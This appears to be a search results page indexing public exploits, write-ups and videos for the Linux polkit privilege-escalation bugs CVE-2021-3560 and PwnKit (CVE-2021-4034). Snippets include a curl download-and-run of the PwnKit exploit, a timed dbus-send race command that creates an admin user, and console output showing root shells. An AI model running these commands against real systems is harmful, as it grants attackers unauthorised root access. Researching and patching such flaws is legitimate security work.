GitHub
github.com › Almorabea › Polkit-exploit › blob › main › CVE-2021-3560.py
Polkit-exploit/CVE-2021-3560.py at main · Almorabea/Polkit-exploit
Privilege escalation with polkit - CVE-2021-3560. Contribute to Almorabea/Polkit-exploit development by creating an account on GitHub.
Author Almorabea
GitHub
github.com › secnigma › CVE-2021-3560-Polkit-Privilege-Esclation
GitHub - secnigma/CVE-2021-3560-Polkit-Privilege-Esclation · GitHub
An attacker can exploit this vulnerability by triggering polkit by sending a dbus message, but closing the request abruptly, while polkit is processing the request.
Starred by 123 users
Forked by 52 users
Languages Shell
Videos
Linux Privilege Escalation Vulnerability in Polkit’s pkexec
03:27
#polkit privilege escalation 2022 | pwnkit #exploit - YouTube
03:40
CVE-2021-4034 Polkit Vulnerability Demonstration - YouTube
- YouTube
08:15
🐧 Linux Permissions + Privileges + Local Exploit Demo - YouTube
23:38
Polkit exploit | CVE-2021-3560 | Linux Privilege Escalation ...
GitHub
github.com › carlosevieira › polkit
GitHub - carlosevieira/polkit · GitHub
This is static binary file to exploit the polkit vulnerability (CVE-2021-4034) Just copy and paste on target this command and get root shell.
Forked by 3 users
Languages Shell
GitHub
github.com › Almorabea › Polkit-exploit
GitHub - Almorabea/Polkit-exploit: Privilege escalation with polkit - CVE-2021-3560 · GitHub
test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py ************** Exploit: Privilege escalation with polkit - CVE-2021-3560 Exploit code written by Ahmad Almorabea @almorabea Original Exploit Author: Kevin Backhouse For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history [+]Starting the Exploit [+] User Created with the name of ahmed [+] Timed out at: 0.008446890996407191 [+] Timed out at: 0.008934336684707084 [+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root bash: cannot set terminal process group (46983): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/home/test/Desktop# id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:/home/test/Desktop# whoami root root@ubuntu:/home/test/Desktop#
Starred by 125 users
Forked by 52 users
Languages Python
GitHub
github.blog › home › security › vulnerability research › privilege escalation with polkit: how to get root on linux with a seven-year-old bug
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug - The GitHub Blog
January 26, 2022 - That’s why it usually takes a few tries for the exploit to succeed. I’d guess it’s also the reason why the bug wasn’t previously discovered. If you could trigger the vulnerability by killing the dbus-send command immediately, then I expect it would have been discovered a long time ago, because that’s a much more obvious thing to test for. The function which asks dbus-daemon for the UID of the requesting connection is named polkit_system_bus_name_get_creds_sync:
GitHub
github.com › aancw › polkit-auto-exploit
GitHub - aancw/polkit-auto-exploit: Automatic Explotation PoC for Polkit CVE-2021-3560 · GitHub
ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin [===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===] [+] Current User: ubuntu [+] Variable for Polkit Configuration [*] Username : adminhs [*] Password : admin1 [*] Fullname : admin [+] Sending create user command to determine time execution [*] Execution time: 0.018076ms [+] Time to killing dbus-send setting to 0.009038ms dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $! ..................
Author aancw
GitHub
github.com › UNICORDev › exploit-CVE-2021-3560
GitHub - UNICORDev/exploit-CVE-2021-3560: Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation · GitHub
Starred by 12 users
Forked by 3 users
Languages Python 95.4% | Dockerfile 4.6%
GitHub
github.com › Kirill89 › CVE-2021-4034
GitHub - Kirill89/CVE-2021-4034: pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034 · GitHub
pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034 - Kirill89/CVE-2021-4034
Starred by 6 users
Forked by 2 users
Languages Shell 49.3% | Dockerfile 31.2% | C 19.5%
GitHub
github.com › LucasPDiniz › CVE-2021-3560
GitHub - LucasPDiniz/CVE-2021-3560: Exploitation of the CVE-2021-3560 polkit vulnerability · GitHub
In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user.
Author LucasPDiniz
GitHub
github.com › v4resk › red-book › blob › main › redteam › privilege-escalation › linux › polkit-exploits › pwnkit.md
red-book/redteam/privilege-escalation/linux/polkit-exploits/pwnkit.md at main · v4resk/red-book
polkit-0.115-13.al8.1 {% endtab %} {% tab title="Exploit" %} We can use this exploit made by ly4k. It should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. #Run the exploit curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x ./PwnKit ./PwnKit # interactive shell ./PwnKit 'id' # single command # Or you may want to compile it by yourself gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC ·
Author v4resk
GitHub
github.com › tufanturhan › polkit-privesc-linux
GitHub - tufanturhan/polkit-privesc-linux · GitHub
It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). You can easily exploit the system using a single script, downloadable and executable with this command:
Author tufanturhan
GitHub
github.com › berdav › CVE-2021-4034
GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day · GitHub
It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). You can easily exploit the system using a single script, downloadable and executable with this command:
Starred by 2K users
Forked by 508 users
Languages C 74.7% | Makefile 19.6% | Shell 5.7%
GitHub
github.com › aancw › polkit-auto-exploit › blob › main › README.md
polkit-auto-exploit/README.md at main · aancw/polkit-auto-exploit
Automatic Explotation PoC for Polkit CVE-2021-3560 - polkit-auto-exploit/README.md at main · aancw/polkit-auto-exploit
Author aancw
GitHub
github.com › n3onhacks › CVE-2021-3560
GitHub - NeonWhiteRabbit/CVE-2021-3560: Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!
February 2, 2022 - >git clone https://github.com/n3onhacks/CVE-2021-3560.git >chmod -R CVE-2021-3560 >cd CVE-2021-3560 >./polkit.sh
Author NeonWhiteRabbit
Exploit-DB
exploit-db.com › exploits › 50689
PolicyKit-1 0.105-31 - Privilege Escalation - Linux local Exploit
January 27, 2022 - # Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation # Exploit Author: Lance Biggerstaff # Original Author: ryaagard (https://github.com/ryaagard) # Date: 27-01-2022 # Github Repo: https://github.com/ryaagard/CVE-2021-4034 # References: ...
GitHub
github.com › topics › cve-2021-4034
Build software better, together
local-privilege-escalation polkit pkexec polkit-agent cve-2021-4034 polkit-exploit
GitHub
github.com › WinMin › CVE-2021-3560
GitHub - winmin/CVE-2021-3560: PolicyKit CVE-2021-3560 Exploitation (Authentication Agent) · GitHub
dev@server:/tmp/CVE-2021-3560$ make dev@server:/tmp/CVE-2021-3560$ ./exploit pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin pid:264181 - [*] main process running ... pid:264183 - [*] starting polkit authentication agent ...
Starred by 25 users
Forked by 5 users
Languages C 96.8% | Makefile 3.2%
GitHub
github.com › arthepsy › CVE-2021-4034
GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) - arthepsy/CVE-2021-4034
Starred by 1.2K users
Forked by 318 users
Languages C